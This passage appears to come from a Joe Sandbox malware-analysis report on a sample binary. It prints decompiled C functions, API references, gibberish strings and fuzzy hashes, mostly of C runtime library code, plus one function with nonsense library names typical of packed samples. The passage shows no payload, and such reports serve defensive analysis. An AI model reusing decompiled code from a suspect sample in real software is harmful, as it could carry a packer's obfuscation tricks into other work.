				_t105 = _a4;
				 *_t105 = _v2092;
				_t105[1] = _v2112;
				return _t105;
			}

0x00404ac0
0x00404aca
0x00404ad0
0x00404ad4
0x00404ad8
0x00404adf
0x00404adf
0x00404ae5
0x00404aeb
0x00404af7
0x00404afb
0x00404aff
0x00404b03
0x00404b08
0x00404b0d
0x00404b15
0x00404b21
0x00404b25
0x00404b34
0x00404b34
0x00404b3c
0x00404b41
0x00404b49
0x00404b4c
0x00404b53
0x00404b61
0x00404b67
0x00404b6b
0x00404b6b
0x00404b75
0x00404b7f
0x00404b93
0x00404b95
0x00404b95
0x00404b81
0x00404b81
0x00404b81
0x00404ba7
0x00404bb1
0x00404bb5
0x00404bbf
0x00404bc8
0x00404bd6
0x00404be3
0x00404be3
0x00404be9
0x00404bf7
0x00404bfc
0x00404c08
0x00404c08
0x00404c12
0x00404c17
0x00404c1b
0x00404c27
0x00404c2a
0x00404c3b
0x00404c3b
0x00404c49
0x00404c52
0x00404c56
0x00404c5e
0x00404c67
0x00404c6f
0x00404c7d
0x00404c85
0x00404c8d
0x00404ca0
0x00404cad
0x00404cb6
0x00404cbb
0x00404cbb
0x00404cc0
0x00000000
0x00000000
0x00404b30
0x00404b30
0x00404cc6
0x00404cd8
0x00404cda
0x00404ce4

APIs

LoadLibraryA.KERNEL32(cokeparikeponovet,74D0F910,74D0FD30,74D0FDB0,74D0FE00), ref: 00404ADF
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?,00000064,?,74D0F910), ref: 00404B61
GetProfileIntW.KERNEL32 ref: 00404BE3
VirtualQuery.KERNEL32(00000000,00000000,00000000), ref: 00404BFC
GetLogicalDriveStringsW.KERNEL32(00000000,?), ref: 00404C08
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404C2A
GetVolumePathNameW.KERNEL32(vovogatimaboxosululehopulecimega covagit nev,?,00000000), ref: 00404C3B

Strings

zedexuvumulehaw, xrefs: 00404BD9
cokeparikeponovet, xrefs: 00404ADA
d, xrefs: 00404C1B
nabecote, xrefs: 00404BDE
, xrefs: 00404B25
vovogatimaboxosululehopulecimega covagit nev, xrefs: 00404C36

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: ConsoleDriveExceptionFilterInputLibraryLoadLogicalNamePathProfileQueryReadStringsUnhandledVirtualVolume
String ID: $cokeparikeponovet$d$nabecote$vovogatimaboxosululehopulecimega covagit nev$zedexuvumulehaw
API String ID: 662862603-475557942
Opcode ID: 5eaff2779189dfc9b7071937ea8ffc99dc70328ce25dfb33048f4765eb4dd497
Instruction ID: 6c3031309f954fb3ad8355ee0975cf2e14416d029572578829e153b15d363eee
Opcode Fuzzy Hash: 5eaff2779189dfc9b7071937ea8ffc99dc70328ce25dfb33048f4765eb4dd497
Instruction Fuzzy Hash: 9D51F2B55083419FC700CF29E98492BBBF4BBD8718F00492EF595A3261D734EA49CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040983D Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040983D(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4b8720; // 0x67107c96
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x4ba180 = _t6;
				 *0x4ba17c = _t22;
				 *0x4ba178 = _t25;
				 *0x4ba174 = _t21;
				 *0x4ba170 = _t27;
				 *0x4ba16c = _t26;
				 *0x4ba198 = ss;
				 *0x4ba18c = cs;
				 *0x4ba168 = ds;
				 *0x4ba164 = es;
				 *0x4ba160 = fs;
				 *0x4ba15c = gs;
				asm("pushfd");
				_pop( *0x4ba190);
				 *0x4ba184 =  *_t31;
				 *0x4ba188 = _v0;
				 *0x4ba194 =  &_a4;
				 *0x4ba0d0 = 0x10001;
				 *0x4ba084 =  *0x4ba188;
				 *0x4ba078 = 0xc0000409;
				 *0x4ba07c = 1;
				_t12 =  *0x4b8720; // 0x67107c96
				_v812 = _t12;
				_t13 =  *0x4b8724; // 0x98ef8369
				_v808 = _t13;
				 *0x4ba0c8 = IsDebuggerPresent();
				_push(1);
				E00419295(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x401c58);
				if( *0x4ba0c8 == 0) {
					_push(1);
					E00419295(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040983d
0x0040983d
0x0040983d
0x0040983d
0x0040983d
0x0040983d
0x0040983d
0x00409843
0x00409845
0x00409845
0x00411f42
0x00411f47
0x00411f4d
0x00411f53
0x00411f59
0x00411f5f
0x00411f65
0x00411f6c
0x00411f73
0x00411f7a
0x00411f81
0x00411f88
0x00411f8f
0x00411f90
0x00411f99
0x00411fa1
0x00411fa9
0x00411fb4
0x00411fc3
0x00411fc8
0x00411fd2
0x00411fdc
0x00411fe1
0x00411fe7
0x00411fec
0x00411ff8
0x00411ffd
0x00411fff
0x00412007
0x00412012
0x0041201f
0x00412021
0x00412023
0x00412028
0x0041203c

APIs

IsDebuggerPresent.KERNEL32 ref: 00411FF2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412007
UnhandledExceptionFilter.KERNEL32(00401C58), ref: 00412012
GetCurrentProcess.KERNEL32(C0000409), ref: 0041202E
TerminateProcess.KERNEL32(00000000), ref: 00412035

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a148586e1d8d84e1b3c6d91d741c08d6705483c30dc9c34b8b93ff999f736cea
Instruction ID: 289571ccfd35081d3f4f076350d409bf8ddc13d553d4592d2abeb0864ad9b716
Opcode Fuzzy Hash: a148586e1d8d84e1b3c6d91d741c08d6705483c30dc9c34b8b93ff999f736cea
Instruction Fuzzy Hash: 7C21ACB4911204ABDB81EF29FD456443BA4FB09344F60523AEA08A7370EBB459A5CF0E

Uniqueness

Uniqueness Score: -1.00%

Function 00414F69 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00414F69(void* __eax, void* __esi) {
				int _t11;

				0x5a1a4678();
				asm("sbb eax, eax");
				 *((intOrPtr*)(__esi + 0x14)) =  *0x83ffff41 + 1;
				_t11 = EnumSystemLocalesA(E00414BC8, 1);
				if(( *(__esi + 8) & 0x00000004) == 0) {
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t11;
				}
				return _t11;
			}

0x00414f70
0x00414f75
0x00414f7f
0x00414f82
0x00414f8c
0x00414f8e
0x00000000
0x00414f8e
0x00414f92

APIs

EnumSystemLocalesA.KERNEL32(Function_00014BC8,00000001), ref: 00414F82

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: f0916f93acb513f751ebe5ccff07e65d47effa9a192b8aacae1c690031828436
Instruction ID: 8bdf9c3a092ba2b27b4043b53e430b60c51f541d986a82b6ba95c35d94ed093f
Opcode Fuzzy Hash: f0916f93acb513f751ebe5ccff07e65d47effa9a192b8aacae1c690031828436
Instruction Fuzzy Hash: 14D0A7307003004BE3208F20C9847A537E0EB11B06F518969DA5685590C7B8A885C744

Uniqueness

Uniqueness Score: -1.00%

Function 00422CD7 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422CD7(int _a4, int _a8, short* _a12, int _a16) {

				return GetLocaleInfoW(_a4, _a8, _a12, _a16);
			}

0x00422cef

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 00422CE8

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: aa85343597b068b8ad44c5da77967b1a8f931754c3e414219dff7358e7f9b0b6
Instruction ID: 36438f9e8d1a1934fc57b7e8a9ad4fc6db181927888968df7567b1c64a608569
Opcode Fuzzy Hash: aa85343597b068b8ad44c5da77967b1a8f931754c3e414219dff7358e7f9b0b6
Instruction Fuzzy Hash: 1EC0023200014DBBCF025F81ED0589A3F2AFB88360B048014FA181543197329971AB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040F98D Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F98D() {

				SetUnhandledExceptionFilter(E0040F94B);
				return 0;
			}

0x0040f992
0x0040f99a

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000F94B), ref: 0040F992

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8e2154a219889b755cd34277e50bfc7b1dcd7bc2075e7ab452ae6411d3455991
Instruction ID: 76adb7da9ded9478862ec17f61c7765aee3c98032ebfaa572cdafbb28b9f67b8
Opcode Fuzzy Hash: 8e2154a219889b755cd34277e50bfc7b1dcd7bc2075e7ab452ae6411d3455991
Instruction Fuzzy Hash: 029002B065114056C6101B715E0AB4525D05AAC7127520471A141E48A4DA7490445559

Uniqueness

Uniqueness Score: -1.00%

Function 023016FC Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.440951446.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2300000_759F.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: 67faec8787ec5a9263607b90a84737ded3ac57a8472582f839538b745845c803
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: 8B3197398062459FCB16CE30D8E0AA6BB70FF87724F18869CC1C98B542D326A14AC7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFA9 Relevance: 48.3, APIs: 32, Instructions: 311
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E0041EFA9(void* __edx, intOrPtr* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr* _t90;
				intOrPtr* _t91;
				signed char _t96;
				void* _t98;
				signed int _t100;
				signed char _t114;
				intOrPtr* _t119;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr* _t136;
				void* _t142;
				void* _t149;
				signed int* _t150;
				intOrPtr* _t154;
				signed int* _t159;
				signed int _t162;
				void* _t168;
				signed int* _t170;
				void* _t176;
				signed char _t185;
				void* _t194;
				void* _t218;
				signed int _t221;
				signed int* _t224;
				signed int _t225;
				void* _t227;
				void* _t228;
				void* _t230;

				_t218 = __edx;
				_t90 =  *0x4ba41c;
				_t189 =  *_t90;
				_t228 = _t227 - 0x30;
				if(_t189 != 0) {
					__eflags = _t189 - 0x36;
					if(_t189 < 0x36) {
						L5:
						__eflags = _t189 - 0x5f;
						if(_t189 == 0x5f) {
							goto L7;
						} else {
							E0041BA57(_a4, 2);
							goto L2;
						}
					} else {
						__eflags = _t189 - 0x39;
						if(_t189 <= 0x39) {
							L7:
							_t185 = _t189 - 0x36;
							_t91 = _t90 + 1;
							 *0x4ba41c = _t91;
							__eflags = _t185 - 0x29;
							if(_t185 != 0x29) {
								__eflags = _t185;
								if(_t185 < 0) {
									goto L15;
								} else {
									__eflags = _t185 - 3;
									goto L14;
								}
								goto L16;
							} else {
								_t189 =  *_t91;
								__eflags = _t189;
								if(_t189 == 0) {
									E0041C4AF(_t189, _a4, 1, _a8);
									goto L18;
								} else {
									_t185 = _t189 - 0x3d;
									__eflags = _t185 - 4;
									 *0x4ba41c = _t91 + 1;
									if(_t185 < 4) {
										L15:
										_t185 = _t185 | 0xffffffff;
										__eflags = _t185;
									} else {
										__eflags = _t185 - 7;
										L14:
										if(__eflags > 0) {
											goto L15;
										}
									}
									L16:
									__eflags = _t185 - 0xffffffff;
									if(_t185 != 0xffffffff) {
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 & 0xffff0000;
										_t224 = _a8;
										_v12 =  *_t224;
										_t221 = _t185 & 0x00000002;
										__eflags = _t221;
										_v8 = _t224[1];
										if(_t221 == 0) {
											L27:
											__eflags = _t185 & 0x00000004;
											if((_t185 & 0x00000004) != 0) {
												__eflags =  !( *0x4ba42c >> 1) & 0x00000001;
												if(__eflags == 0) {
													_t142 = E0041DEEE(_t218, __eflags,  &_v52);
													_t189 =  &_v12;
													E0041B64A( &_v12, _t142);
												} else {
													_t149 = E0041C48B(_t189,  &_v36, 0x20, E0041DEEE(_t218, __eflags,  &_v44));
													_t228 = _t228 + 0x10;
													_t150 = E0041C237(_t149,  &_v52,  &_v12);
													_t189 =  *_t150;
													_v12 =  *_t150;
													_v8 = _t150[1];
												}
											}
											_t96 =  !( *0x4ba42c >> 1);
											__eflags = _t96 & 0x00000001;
											if((_t96 & 0x00000001) == 0) {
												_t98 = E0041C154(_t189,  &_v52);
												_t191 =  &_v12;
												E0041B64A( &_v12, _t98);
											} else {
												_t136 = E0041C237(E0041C154(_t189,  &_v44),  &_v52,  &_v12);
												_t191 =  *_t136;
												_v12 =  *_t136;
												_v8 =  *((intOrPtr*)(_t136 + 4));
											}
											__eflags =  *_t224;
											if( *_t224 != 0) {
												_t129 = E0041C48B(_t191,  &_v44, 0x28,  &_v12);
												_t228 = _t228 + 0xc;
												_t130 = E0041C4F7(_t129,  &_v52, 0x29);
												_v12 =  *_t130;
												_v8 =  *((intOrPtr*)(_t130 + 4));
											}
											_t100 = E0041B4B2(0x4ba3fc, 8, 0);
											__eflags = _t100;
											if(_t100 == 0) {
												_t225 = 0;
												__eflags = 0;
											} else {
												 *(_t100 + 4) = 0;
												 *(_t100 + 4) =  *(_t100 + 4) & 0xffff00ff;
												 *_t100 = 0;
												_t225 = _t100;
											}
											E0041BCF4( &_v28, _t225);
											_pop(_t194);
											E0041C048( &_v12, E0041C4F7(E0041C48B(_t194,  &_v36, 0x28, E0041C765(_t194,  &_v44)),  &_v52, 0x29));
											__eflags = ( *0x4ba42c & 0x00000060) - 0x60;
											if(( *0x4ba42c & 0x00000060) != 0x60) {
												__eflags = _t221;
												if(_t221 != 0) {
													E0041C048( &_v12,  &_v20);
												}
											}
											_t114 =  !( *0x4ba42c >> 8);
											__eflags = _t114 & 0x00000001;
											_push( &_v52);
											if((_t114 & 0x00000001) == 0) {
												E0041B64A( &_v12, E0041C841());
											} else {
												E0041C048( &_v12, E0041C841());
											}
											__eflags = _t225;
											if(_t225 == 0) {
												_push(3);
												goto L51;
											} else {
												 *_t225 = _v12;
												 *((intOrPtr*)(_t225 + 4)) = _v8;
												_t119 = _a4;
												 *_t119 = _v28;
												 *((intOrPtr*)(_t119 + 4)) = _v24;
											}
										} else {
											_t154 = E0041C4D3(_t189,  &_v36, "::",  &_v12);
											_t211 =  *_t154;
											_v8 =  *((intOrPtr*)(_t154 + 4));
											_t230 = _t228 + 0xc;
											__eflags =  *((char*)( *0x4ba41c));
											_v12 =  *_t154;
											_push( &_v12);
											if( *((char*)( *0x4ba41c)) == 0) {
												_push(1);
												_push( &_v52);
												_t159 = E0041C4AF(_t211);
												_t228 = _t230 + 0xc;
											} else {
												_t176 = E0041C48B(_t211,  &_v52, 0x20, E0041ED39(_t218));
												_t228 = _t230 + 0x10;
												_t159 = E0041C237(_t176,  &_v44,  &_v36);
											}
											_t212 =  *_t159;
											_v8 = _t159[1];
											_t162 =  *((intOrPtr*)( *0x4ba41c));
											_v12 =  *_t159;
											__eflags = _t162;
											if(_t162 == 0) {
												E0041C4AF(_t212, _a4, 1,  &_v12);
												goto L52;
											} else {
												__eflags = _t162 - 0x40;
												if(_t162 != 0x40) {
													_push(2);
													L51:
													E0041BA57(_a4);
													L52:
													_t119 = _a4;
												} else {
													 *0x4ba41c =  *0x4ba41c + 1;
													__eflags = ( *0x4ba42c & 0x00000060) - 0x60;
													_push( &_v52);
													if(( *0x4ba42c & 0x00000060) == 0x60) {
														_t168 = E0041B980();
														_t189 =  &_v20;
														E0041B64A( &_v20, _t168);
													} else {
														_t170 = E0041B980();
														_t189 =  *_t170;
														_v20 =  *_t170;
														_v16 = _t170[1];
													}
													goto L27;
												}
											}
										}
									} else {
										E0041BA57(_a4, 2);
										L18:
										_t119 = _a4;
									}
								}
							}
							return _t119;
						} else {
							goto L5;
						}
					}
				} else {
					E0041C4AF(_t189, _a4, 1, _a8);
					L2:
					return _a4;
				}
			}

0x0041efa9
0x0041efae
0x0041efb3
0x0041efb5
0x0041efba
0x0041efd1
0x0041efd4
0x0041efdb
0x0041efdb
0x0041efde
0x00000000
0x0041efe0
0x0041efe5
0x00000000
0x0041efe5
0x0041efd6
0x0041efd6
0x0041efd9
0x0041efec
0x0041eff0
0x0041eff3
0x0041eff4
0x0041eff9
0x0041effc
0x0041f02c
0x0041f02e
0x00000000
0x0041f030
0x0041f030
0x00000000
0x0041f030
0x00000000
0x0041effe
0x0041effe
0x0041f000
0x0041f002
0x0041f022
0x00000000
0x0041f004
0x0041f007
0x0041f00b
0x0041f00e
0x0041f013
0x0041f035
0x0041f035
0x0041f035
0x0041f015
0x0041f015
0x0041f033
0x0041f033
0x00000000
0x00000000
0x0041f033
0x0041f038
0x0041f038
0x0041f03b
0x0041f04f
0x0041f053
0x0041f05b
0x0041f061
0x0041f069
0x0041f069
0x0041f06c
0x0041f06f
0x0041f11f
0x0041f11f
0x0041f122
0x0041f131
0x0041f133
0x0041f19b
0x0041f1a2
0x0041f1a5
0x0041f135
0x0041f14d
0x0041f152
0x0041f157
0x0041f15c
0x0041f161
0x0041f164
0x0041f164
0x0041f133
0x0041f1b1
0x0041f1b3
0x0041f1b5
0x0041f1e1
0x0041f1e8
0x0041f1eb
0x0041f1b7
0x0041f1cb
0x0041f1d0
0x0041f1d5
0x0041f1d8
0x0041f1d8
0x0041f1f2
0x0041f1f4
0x0041f206
0x0041f20b
0x0041f210
0x0041f21a
0x0041f21d
0x0041f21d
0x0041f228
0x0041f22d
0x0041f22f
0x0041f242
0x0041f242
0x0041f231
0x0041f231
0x0041f235
0x0041f23c
0x0041f23e
0x0041f23e
0x0041f249
0x0041f24f
0x0041f279
0x0041f286
0x0041f288
0x0041f28a
0x0041f28c
0x0041f295
0x0041f295
0x0041f28c
0x0041f2a2
0x0041f2a4
0x0041f2a9
0x0041f2aa
0x0041f2c7
0x0041f2ac
0x0041f2b6
0x0041f2b6
0x0041f2cc
0x0041f2ce
0x0041f2eb
0x00000000
0x0041f2d0
0x0041f2d3
0x0041f2d8
0x0041f2de
0x0041f2e1
0x0041f2e6
0x0041f2e6
0x0041f075
0x0041f082
0x0041f087
0x0041f08c
0x0041f094
0x0041f097
0x0041f09d
0x0041f0a0
0x0041f0a1
0x0041f0cb
0x0041f0cd
0x0041f0ce
0x0041f0d3
0x0041f0a3
0x0041f0b7
0x0041f0bc
0x0041f0c1
0x0041f0c1
0x0041f0d6
0x0041f0db
0x0041f0e3
0x0041f0e5
0x0041f0e8
0x0041f0ea
0x0041f18a
0x00000000
0x0041f0f0
0x0041f0f0
0x0041f0f2
0x0041f17a
0x0041f2ed
0x0041f2f0
0x0041f2f5
0x0041f2f5
0x0041f0f8
0x0041f0fd
0x0041f106
0x0041f10b
0x0041f10c
0x0041f169
0x0041f170
0x0041f173
0x0041f10e
0x0041f10e
0x0041f114
0x0041f119
0x0041f11c
0x0041f11c
0x00000000
0x0041f10c
0x0041f0f2
0x0041f0ea
0x0041f03d
0x0041f042
0x0041f047
0x0041f047
0x0041f047
0x0041f03b
0x0041f002
0x0041f2fc
0x00000000
0x00000000
0x00000000
0x0041efd9
0x0041efbc
0x0041efc4
0x0041efcc
0x0041efd0
0x0041efd0

APIs

operator+.LIBCMT ref: 0041F022
DName::DName.LIBCMT ref: 0041F042
operator+.LIBCMT ref: 0041F082
UnDecorator::getScope.LIBCMT ref: 0041F0AB
operator+.LIBCMT ref: 0041F0B7
DName::operator+.LIBCMT ref: 0041F0C1
operator+.LIBCMT ref: 0041EFC4

Part of subcall function 0041C4AF: DName::DName.LIBCMT ref: 0041C4C2
Part of subcall function 0041C4AF: DName::operator+.LIBCMT ref: 0041C4C9

DName::DName.LIBCMT ref: 0041EFE5
operator+.LIBCMT ref: 0041F0CE
UnDecorator::getThisType.LIBCMT ref: 0041F10E
operator+.LIBCMT ref: 0041F14D
DName::operator+.LIBCMT ref: 0041F157
UnDecorator::getThisType.LIBCMT ref: 0041F169
DName::operator|=.LIBCMT ref: 0041F173
operator+.LIBCMT ref: 0041F18A
DName::DName.LIBCMT ref: 0041F2F0

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: operator+$NameName::$Decorator::getName::operator+$ThisType$Name::operator|=Scope
String ID:
API String ID: 398566123-0
Opcode ID: 78456925ef2b9d9cf5970773801ef93c0d3db8cc13706568ad7fc906e462c9e6
Instruction ID: 54be8fcf389d0b11c15a4fadf578dbf1ba859b142e17d93b31936ac61d3125f3
Opcode Fuzzy Hash: 78456925ef2b9d9cf5970773801ef93c0d3db8cc13706568ad7fc906e462c9e6
Instruction Fuzzy Hash: 53B19375900208AFDB00DFA5CC95EEE7BB8EF08304F14416BF505E7291DB789A8ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D742 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E0040D742(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x4b62c0);
				E0040E1B4(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040DE01(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x401be0;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x4b8a48;
				E00410EE5(_t35, 1, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E0040D817();
				E00410EE5(_t35, 1, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x4b8930; // 0x4b8858
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E00409B1B( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0040E1F9(E0040D820());
			}

0x0040d742
0x0040d742
0x0040d744
0x0040d749
0x0040d74e
0x0040d754
0x0040d75c
0x0040d75f
0x0040d764
0x0040d765
0x0040d768
0x0040d76b
0x0040d775
0x0040d77a
0x0040d782
0x0040d78a
0x0040d79a
0x0040d79a
0x0040d7a0
0x0040d7a3
0x0040d7aa
0x0040d7b1
0x0040d7ba
0x0040d7c0
0x0040d7c7
0x0040d7cd
0x0040d7d4
0x0040d7db
0x0040d7e1
0x0040d7e4
0x0040d7e7
0x0040d7ec
0x0040d7ee
0x0040d7f3
0x0040d7f3
0x0040d7f9
0x0040d7ff
0x0040d810

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,004B62C0,0000000C,0040D87D,00000000,00000000,?,00000000,0040BCE1,00407948,004B5FB0,0000000C,00405020,00000000,00000000), ref: 0040D754
__crt_waiting_on_module_handle.LIBCMT ref: 0040D75F

Part of subcall function 0040DE01: Sleep.KERNEL32(000003E8,00000000,?,0040D668,KERNEL32.DLL,?,0040D6D4,?,00000000,0040BCE1,00407948,004B5FB0,0000000C,00405020,00000000,00000000), ref: 0040DE0D
Part of subcall function 0040DE01: GetModuleHandleW.KERNEL32(?,?,0040D668,KERNEL32.DLL,?,0040D6D4,?,00000000,0040BCE1,00407948,004B5FB0,0000000C,00405020,00000000,00000000), ref: 0040DE16

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040D788
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040D798
__lock.LIBCMT ref: 0040D7BA
InterlockedIncrement.KERNEL32(004B8A48), ref: 0040D7C7
__lock.LIBCMT ref: 0040D7DB
___addlocaleref.LIBCMT ref: 0040D7F9

Strings

DecodePointer, xrefs: 0040D790
KERNEL32.DLL, xrefs: 0040D74E, 0040D753, 0040D75E
EncodePointer, xrefs: 0040D77C

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 83fb60daea15d42121738b9cdd6a29ed98e98107d8ad069768099db9e188e8c8
Instruction ID: b002881edb7f701d8de29d74bbb846be879001f49380afc615a6a4c69dfef239
Opcode Fuzzy Hash: 83fb60daea15d42121738b9cdd6a29ed98e98107d8ad069768099db9e188e8c8
